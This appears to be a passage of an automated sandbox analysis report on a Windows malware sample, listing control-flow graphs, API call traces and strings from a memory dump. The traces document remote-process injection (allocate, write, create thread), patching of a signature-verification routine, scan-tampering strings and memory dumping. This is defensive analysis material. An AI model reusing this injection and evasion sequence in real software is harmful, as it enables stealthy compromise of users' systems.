290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5994->6039 6040 291bfea-291c165 call 290480c call 290494c call 2904798 call 290494c call 2917ca8 call 290480c call 290494c call 2904798 call 290494c call 2917ca8 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 5994->6040 6160 291b516-291b674 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 6039->6160 6161 291b37e-291b37f 6039->6161 6040->5812 6246 291b6a0-291bfc4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 291a374 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 GetModuleHandleW GetProcAddress call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 NtWriteVirtualMemory call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 GetModuleHandleW GetProcAddress call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 NtCreateThreadEx call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 6160->6246 6247 291b676-291b69b call 291a2b8 6160->6247 6163 291b383-291b4fa call 291a368 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 6161->6163 6253 291b4ff-291b510 6163->6253 6519 291bfc9-291bfd0 6246->6519 6247->6246 6253->6160 6253->6163 6519->5812 6520 291bfd6-291bfe5 CloseHandle 6519->6520 6520->5812
                                                                APIs
                                                                  • Part of subcall function 02917DF4: LoadLibraryW.KERNEL32(?,00000000,02917EC3), ref: 02917E24
                                                                  • Part of subcall function 02917DF4: GetModuleHandleW.KERNEL32(?,?,00000000,02917EC3), ref: 02917E2A
                                                                  • Part of subcall function 02917DF4: GetProcAddress.KERNEL32(00000000,00000000), ref: 02917E43
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,0293F358,0291C424,ScanString,0293F358,0291C424,ScanBuffer,0293F358,0291C424,Initialize,0293F358,0291C424,UacScan,0293F358), ref: 0291A7AE
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291A7B4
                                                                • NtOpenProcess.NTDLL(0293F560,001F0FFF,0293F324,0293F33C), ref: 0291A8AC
                                                                  • Part of subcall function 02902EE0: QueryPerformanceCounter.KERNEL32 ref: 02902EE4
                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 0291ABFF
                                                                  • Part of subcall function 02917924: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                  • Part of subcall function 02917924: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                  • Part of subcall function 02917924: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                • IsBadHugeReadPtr.KERNEL32(27390000,00000040), ref: 0291AD98
                                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 0291ADC5
                                                                • GetCurrentProcess.KERNEL32(00000000,17CF3400,00003000,00000040,?,000000F8,27390000,00000040,?,?,0000007C,00000000,00000000), ref: 0291AE1C
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,0293F358,0291C424,ScanBuffer,0293F358,0291C424,UacScan,0293F358,0291C424,ScanBuffer,0293F358,0291C424,OpenSession,0293F358), ref: 0291BA5E
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291BA64
                                                                • NtWriteVirtualMemory.NTDLL(05350000,05350000,278F0000,17CF3400,00000000,OpenSession,0293F358,0291C424,UacInitialize,0293F358,0291C424,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,0293F358), ref: 0291BB75
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,0293F358,0291C424,ScanString,0293F358,0291C424,?,?,0000007C,00000000,00000000), ref: 0291BC63
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0291BC69
                                                                • NtCreateThreadEx.NTDLL(0293F53C,02000000,0293F324,05351638,05351638,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,0293F358,0291C424,UacInitialize,0293F358), ref: 0291BEE5
                                                                • CloseHandle.KERNEL32(000005B4,ScanString,0293F358,0291C424,OpenSession,0293F358,0291C424,?,?,0000007C,00000000,00000000), ref: 0291BFE0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Handle$AddressModuleProc$Process$CurrentHugeMemoryReadVirtual$AllocateCloseCounterCreateLibraryLoadOpenPerformanceQueryThreadWrite
                                                                • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll
                                                                • API String ID: 3432575501-716930375
                                                                • Opcode ID: 41abc2e31ba271a54ac4d8c172f044f7a191c0165eb8b859f47c5d480a07d7e4
                                                                • Instruction ID: 29cf84f659655b42c5c3d7613bc9f2fc948a185adb511e065ffd523ae3637c4e
                                                                • Opcode Fuzzy Hash: 41abc2e31ba271a54ac4d8c172f044f7a191c0165eb8b859f47c5d480a07d7e4
                                                                • Instruction Fuzzy Hash: 8EF20935A5015D9FDB11EBA5DCC1EEEB3FAEFC5300F1055A2A109AB294DE70AE418F42

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6521 2905a78-2905ab9 GetModuleFileNameA RegOpenKeyExA 6522 2905afb-2905b3e call 29058b4 RegQueryValueExA 6521->6522 6523 2905abb-2905ad7 RegOpenKeyExA 6521->6523 6530 2905b40-2905b5c RegQueryValueExA 6522->6530 6531 2905b62-2905b7c RegCloseKey 6522->6531 6523->6522 6524 2905ad9-2905af5 RegOpenKeyExA 6523->6524 6524->6522 6526 2905b84-2905bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 6524->6526 6528 2905bbb-2905bbf 6526->6528 6529 2905c9e-2905ca5 6526->6529 6532 2905bc1-2905bc5 6528->6532 6533 2905bcb-2905be1 lstrlen 6528->6533 6530->6531 6534 2905b5e 6530->6534 6532->6529 6532->6533 6536 2905be4-2905be7 6533->6536 6534->6531 6537 2905bf3-2905bfb 6536->6537 6538 2905be9-2905bf1 6536->6538 6537->6529 6540 2905c01-2905c06 6537->6540 6538->6537 6539 2905be3 6538->6539 6539->6536 6541 2905c30-2905c32 6540->6541 6542 2905c08-2905c2e lstrcpyn LoadLibraryExA 6540->6542 6541->6529 6543 2905c34-2905c38 6541->6543 6542->6541 6543->6529 6544 2905c3a-2905c6a lstrcpyn LoadLibraryExA 6543->6544 6544->6529 6545 2905c6c-2905c9c lstrcpyn LoadLibraryExA 6544->6545 6545->6529
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02905A94
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AB2
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AD0
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                • RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                • RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02905B94
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02905BA1
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02905BA7
                                                                • lstrlen.KERNEL32(00000000), ref: 02905BD2
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C19
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C29
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02905C51
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C61
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C87
                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02905C97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1759228003-3917250287
                                                                • Opcode ID: 485976a529444b44841564a8a7fef536d7ff748ab883940ebec87401d28e1db2
                                                                • Instruction ID: 4e11b2950730cac7940661eb4169723310cf8899d0d42d928bea30d71b075580
                                                                • Opcode Fuzzy Hash: 485976a529444b44841564a8a7fef536d7ff748ab883940ebec87401d28e1db2
                                                                • Instruction Fuzzy Hash: D4518571A4021C7EFF25D6A4CCC6FEF77ADAB48744F8101A5BA04E61C1D7749A448F64

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
                                                                • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                • String ID: NtWriteV$irtualMemory$ntdll
                                                                • API String ID: 4260932595-852282483
                                                                • Opcode ID: bea44d30d37410847fdf787aecd638cc28687bc927574b802407292ad83c8213
                                                                • Instruction ID: 70e465d5d1376d6fbb601c596ff33e276cc3b593c40b6abc6928ae088266130a
                                                                • Opcode Fuzzy Hash: bea44d30d37410847fdf787aecd638cc28687bc927574b802407292ad83c8213
                                                                • Instruction Fuzzy Hash: 14014F75A4420DAFEB00EFE9DC81EAF77EDEB89750B510864B904D3A80D734ED108B60

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,00000000,00000000,02917AF8,?,?,00000000), ref: 02917AB8
                                                                • GetProcAddress.KERNEL32(00000000,ntdll), ref: 02917ABE
                                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02917ADC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                • String ID: NtWriteV$irtualMemory$ntdll
                                                                • API String ID: 4260932595-852282483
                                                                • Opcode ID: a936687ad9ce8c1fc91152756cc23435542396158e64b156a6ab3fb621dcf13c
                                                                • Instruction ID: e7c27738a593a63ee6faee326b23421a903d1bf0927d982e83734d8b275f6971
                                                                • Opcode Fuzzy Hash: a936687ad9ce8c1fc91152756cc23435542396158e64b156a6ab3fb621dcf13c
                                                                • Instruction Fuzzy Hash: C5014F75A4420DAFEB00EFD9DC81EAF77EDEB89750B510864B904D3A80D734AD108B60

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 8289 2917ca8-2917ccd LoadLibraryW 8290 2917d17-2917d1d 8289->8290 8291 2917ccf-2917ce7 GetProcAddress 8289->8291 8292 2917ce9-2917d08 NtWriteVirtualMemory 8291->8292 8293 2917d0c-2917d12 FreeLibrary 8291->8293 8292->8293 8294 2917d0a 8292->8294 8293->8290 8294->8293
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize,0293F384,02919CD0,UacScan), ref: 02917CBC
                                                                • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02917CD6
                                                                • NtWriteVirtualMemory.NTDLL(00000000,00000000,0293F368,00000001,0293F374), ref: 02917CFC
                                                                • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,0293F384,0291998C,ScanString,0293F384,02919CD0,ScanBuffer,0293F384,02919CD0,Initialize), ref: 02917D12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                • API String ID: 1002360270-4067648912
                                                                • Opcode ID: f130bb5a5e599edcde5e795d04e495407269260af7347e20e4c6af48801ca9f3
                                                                • Instruction ID: 888aacfb0565fe503d8c9481bcf0d99daa05bf307f90ad781210269296af3796
                                                                • Opcode Fuzzy Hash: f130bb5a5e599edcde5e795d04e495407269260af7347e20e4c6af48801ca9f3
                                                                • Instruction Fuzzy Hash: F4F0AF71E886189EE314AAA9AC84FB673DCAB857D5F000929B114C7580D7785824CB60

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                Strings
                                                                • NtAllocateVirtualMemory, xrefs: 02917927
                                                                • C:\Windows\System32\ntdll.dll, xrefs: 0291792C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                • API String ID: 421316089-2206134580
                                                                • Opcode ID: c9d1128f22b2ce5d5b0789dc6c8e33a6d20f3b2eac61d2049013dc66cbb46338
                                                                • Instruction ID: 5863e2ee2dfa3c59ba31004aebec69c608d91d303d4ebb840a72e7556257ebbc
                                                                • Opcode Fuzzy Hash: c9d1128f22b2ce5d5b0789dc6c8e33a6d20f3b2eac61d2049013dc66cbb46338
                                                                • Instruction Fuzzy Hash: 1BE0E5B2A8020DBFDB00EED8E881EEA37ACEB48750F004411BA05C7240D734E9208BA0

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02917931
                                                                • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02917937
                                                                • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02917957
                                                                Strings
                                                                • NtAllocateVirtualMemory, xrefs: 02917927
                                                                • C:\Windows\System32\ntdll.dll, xrefs: 0291792C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                • API String ID: 421316089-2206134580
                                                                • Opcode ID: 27a23560499b5dd5805603a3a7e4667451c4e31db6d1eb176fd6c9302d042d3e
                                                                • Instruction ID: baaa26bc61e54078dcecd1a6ff0beade2b62bf8f33865260c2a1daeb756202ab
                                                                • Opcode Fuzzy Hash: 27a23560499b5dd5805603a3a7e4667451c4e31db6d1eb176fd6c9302d042d3e
                                                                • Instruction Fuzzy Hash: 1DE0E5B298020DBFDB00EED8E881EDA37ACAB48750F004401BA05C7240C734E5208BA0

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 02904ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02904EDA
                                                                • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0291C7F3
                                                                • NtOpenFile.NTDLL(?,00100001,?,?,00000001,00000020), ref: 0291C823
                                                                • NtQueryInformationFile.NTDLL(?,?,?,00000018,00000005), ref: 0291C838
                                                                • NtReadFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0291C864
                                                                • NtClose.NTDLL(?), ref: 0291C86D
                                                                  • Part of subcall function 02904C0C: SysFreeString.OLEAUT32 ref: 02904C1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                • String ID:
                                                                • API String ID: 1897104825-0
                                                                • Opcode ID: be0b595177dfcf9dc72ff6b814bf0a971b2384090dc7e0f0ec50d9635ca1196a
                                                                • Instruction ID: a187a04f2c596effcc0c37f42c86f544010325188161af4445897b2568cff0ad
                                                                • Opcode Fuzzy Hash: be0b595177dfcf9dc72ff6b814bf0a971b2384090dc7e0f0ec50d9635ca1196a
                                                                • Instruction Fuzzy Hash: A621EE71A5030D7EEB11EAE5CC82FDEB7ADAB48B00F501561B704E61C0D6B4AA058A95
                                                                APIs
                                                                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0291D086
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CheckConnectionInternet
                                                                • String ID: Initialize$OpenSession$ScanBuffer
                                                                • API String ID: 3847983778-3852638603
                                                                • Opcode ID: 3bfc060e9904b7b49f3cd573f0ee94701986d210aca5c04120232d30cc24f4ce
                                                                • Instruction ID: 5ff0863f9730fc74b4b1a6d873fa53b705c220586c9477d10ce94bc8f108e942
                                                                • Opcode Fuzzy Hash: 3bfc060e9904b7b49f3cd573f0ee94701986d210aca5c04120232d30cc24f4ce
                                                                • Instruction Fuzzy Hash: 25410C35A1010D9FEB10EBE5C881EDEB3FAEFC8710F215471E151A7280DA74AD068F65
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 0291CCA2
                                                                • Sleep.KERNEL32(00000000,?,0291D5EC,00000000,029272C7,?,?,00000269,00000000,00000000), ref: 0291CCB4
                                                                • GetTickCount.KERNEL32 ref: 0291CCB9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CountTick$Sleep
                                                                • String ID: 500
                                                                • API String ID: 4250438611-612300854
                                                                • Opcode ID: 52bf5a79658ce33e305b08668994c51c8847e1e4e7dddae6fe1c9898be7170f2
                                                                • Instruction ID: e3f515b964744bc45bc0f2a8ed6555f6f4ab047ba92d332586ecffef69867549
                                                                • Opcode Fuzzy Hash: 52bf5a79658ce33e305b08668994c51c8847e1e4e7dddae6fe1c9898be7170f2
                                                                • Instruction Fuzzy Hash: A2C080D629110D0EC5007DF56DD457F064D87D07127103E72F006C5180C615C9516966
                                                                APIs
                                                                  • Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0291A13D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 2242398760-0
                                                                • Opcode ID: e428e787eb020c47e873283dd9b1c451cdb7cb95c3e9e39ed3b34a4b3bae3c6d
                                                                • Instruction ID: cd35791cb69685a89eb8acebf8caa1ee3e4acd778825c2c397be450cbb5c61d0
                                                                • Opcode Fuzzy Hash: e428e787eb020c47e873283dd9b1c451cdb7cb95c3e9e39ed3b34a4b3bae3c6d
                                                                • Instruction Fuzzy Hash: A9C08062E06224575B1065F97DCC8D3474DCD451F731408A2B50DD3111D7254C10D190

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6546 292326a-29239d9 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 291cb40 call 290494c call 29046a4 call 291d310 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 2904898 6759 292450e-292470d call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 2904798 call 290494c call 29046a4 call 2917df4 call 290480c call 290494c call 29046a4 call 